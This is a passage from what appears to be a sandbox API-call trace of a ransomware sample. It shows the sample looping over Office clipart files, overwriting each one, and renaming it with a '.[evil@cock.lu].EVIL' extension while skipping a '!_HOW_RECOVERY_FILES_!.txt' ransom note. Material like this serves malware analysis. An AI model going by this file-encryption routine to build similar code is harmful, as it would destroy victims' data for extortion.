0x84b1160840 [0148.297] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.297] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7460, lpOverlapped=0x0) returned 1 [0148.297] CloseHandle (hObject=0x1a8) returned 1 [0148.297] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.297] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.298] __uncaught_exception () returned 0x84b1160800 [0148.298] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.298] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf.[evil@cock.lu].evil")) returned 1 [0148.298] ??_V@YAXPEAX@Z () returned 0x1 [0148.301] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF", dwFileAttributes=0x200) returned 0 [0148.301] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.301] wcsstr (_Str="J0183174.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.301] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 69 [0148.301] wcscmp (_String1="J0183174.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.301] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0183174.WMF") returned 0x0 [0148.301] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF") returned 0x45 [0148.301] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.303] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6fd2, lpOverlapped=0x0) returned 1 [0148.332] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.332] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.332] _errno () returned 0x84b1160840 [0148.332] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.332] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x6fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6fe0, lpOverlapped=0x0) returned 1 [0148.332] CloseHandle (hObject=0x1a8) returned 1 [0148.332] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.333] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.333] __uncaught_exception () returned 0x84b1160800 [0148.333] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.333] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf.[evil@cock.lu].evil")) returned 1 [0148.334] ??_V@YAXPEAX@Z () returned 0x1 [0148.336] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF", dwFileAttributes=0x200) returned 0 [0148.336] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.336] wcsstr (_Str="J0183198.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.336] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 69 [0148.336] wcscmp (_String1="J0183198.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.336] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0183198.WMF") returned 0x0 [0148.336] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF") returned 0x45 [0148.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.339] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5f6e, lpOverlapped=0x0) returned 1 [0148.842] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.842] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.842] _errno () returned 0x84b1160840 [0148.842] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.842] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x5f80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5f80, lpOverlapped=0x0) returned 1 [0148.877] CloseHandle (hObject=0x1a8) returned 1 [0148.878] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.878] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.878] __uncaught_exception () returned 0x84b1160800 [0148.878] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.878] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf.[evil@cock.lu].evil")) returned 1 [0148.879] ??_V@YAXPEAX@Z () returned 0x1 [0148.882] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF", dwFileAttributes=0x200) returned 0 [0148.882] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.882] wcsstr (_Str="J0183574.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.882] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 69 [0148.882] wcscmp (_String1="J0183574.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.882] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0183574.WMF") returned 0x0 [0148.882] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF") returned 0x45 [0148.882] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.884] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b4a, lpOverlapped=0x0) returned 1 [0149.031] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.031] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.031] _errno () returned 0x84b1160840 [0149.031] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.032] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4b60, lpOverlapped=0x0) returned 1 [0149.032] CloseHandle (hObject=0x1a8) returned 1 [0149.032] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.032] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.032] __uncaught_exception () returned 0x84b1160800 [0149.032] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.032] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf.[evil@cock.lu].evil")) returned 1 [0149.033] ??_V@YAXPEAX@Z () returned 0x1 [0149.036] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF", dwFileAttributes=0x200) returned 0 [0149.036] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.036] wcsstr (_Str="J0185670.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.036] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 69 [0149.036] wcscmp (_String1="J0185670.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.036] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185670.WMF") returned 0x0 [0149.036] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF") returned 0x45 [0149.036] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.038] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c88, lpOverlapped=0x0) returned 1 [0149.045] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.045] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.045] _errno () returned 0x84b1160840 [0149.045] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.045] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ca0, lpOverlapped=0x0) returned 1 [0149.045] CloseHandle (hObject=0x1a8) returned 1 [0149.045] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.045] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.046] __uncaught_exception () returned 0x84b1160800 [0149.046] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.046] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf.[evil@cock.lu].evil")) returned 1 [0149.047] ??_V@YAXPEAX@Z () returned 0x1 [0149.049] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF", dwFileAttributes=0x200) returned 0 [0149.050] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.050] wcsstr (_Str="J0185774.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.050] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 69 [0149.050] wcscmp (_String1="J0185774.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.050] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185774.WMF") returned 0x0 [0149.050] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF") returned 0x45 [0149.050] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.052] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4e46, lpOverlapped=0x0) returned 1 [0149.072] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.072] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.072] _errno () returned 0x84b1160840 [0149.072] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.072] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4e60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4e60, lpOverlapped=0x0) returned 1 [0149.073] CloseHandle (hObject=0x1a8) returned 1 [0149.073] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.073] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.073] __uncaught_exception () returned 0x84b1160800 [0149.073] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.073] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf.[evil@cock.lu].evil")) returned 1 [0149.074] ??_V@YAXPEAX@Z () returned 0x1 [0149.077] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF", dwFileAttributes=0x200) returned 0 [0149.077] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.077] wcsstr (_Str="J0185776.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.077] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 69 [0149.077] wcscmp (_String1="J0185776.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.077] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185776.WMF") returned 0x0 [0149.077] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF") returned 0x45 [0149.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.079] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x69d8, lpOverlapped=0x0) returned 1 [0149.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.095] _errno () returned 0x84b1160840 [0149.095] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.095] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x69e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x69e0, lpOverlapped=0x0) returned 1 [0149.095] CloseHandle (hObject=0x1a8) returned 1 [0149.096] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.096] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.096] __uncaught_exception () returned 0x84b1160800 [0149.096] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.096] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf.[evil@cock.lu].evil")) returned 1 [0149.097] ??_V@YAXPEAX@Z () returned 0x1 [0149.099] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF", dwFileAttributes=0x200) returned 0 [0149.100] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.100] wcsstr (_Str="J0185778.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.100] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 69 [0149.100] wcscmp (_String1="J0185778.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.100] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185778.WMF") returned 0x0 [0149.100] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF") returned 0x45 [0149.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.101] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x62e0, lpOverlapped=0x0) returned 1 [0149.122] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.122] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.122] _errno () returned 0x84b1160840 [0149.122] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.122] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x6300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6300, lpOverlapped=0x0) returned 1 [0149.122] CloseHandle (hObject=0x1a8) returned 1 [0149.122] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.123] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.123] __uncaught_exception () returned 0x84b1160800 [0149.123] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.123] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf.[evil@cock.lu].evil")) returned 1 [0149.124] ??_V@YAXPEAX@Z () returned 0x1 [0149.126] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF", dwFileAttributes=0x200) returned 0 [0149.127] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.127] wcsstr (_Str="J0185780.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 69 [0149.127] wcscmp (_String1="J0185780.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185780.WMF") returned 0x0 [0149.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF") returned 0x45 [0149.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.128] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe956, lpOverlapped=0x0) returned 1 [0149.180] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.180] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.180] _errno () returned 0x84b1160840 [0149.180] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.180] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xe960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe960, lpOverlapped=0x0) returned 1 [0149.180] CloseHandle (hObject=0x1a8) returned 1 [0149.180] _wfsopen (_FileName="C:\\\\Program 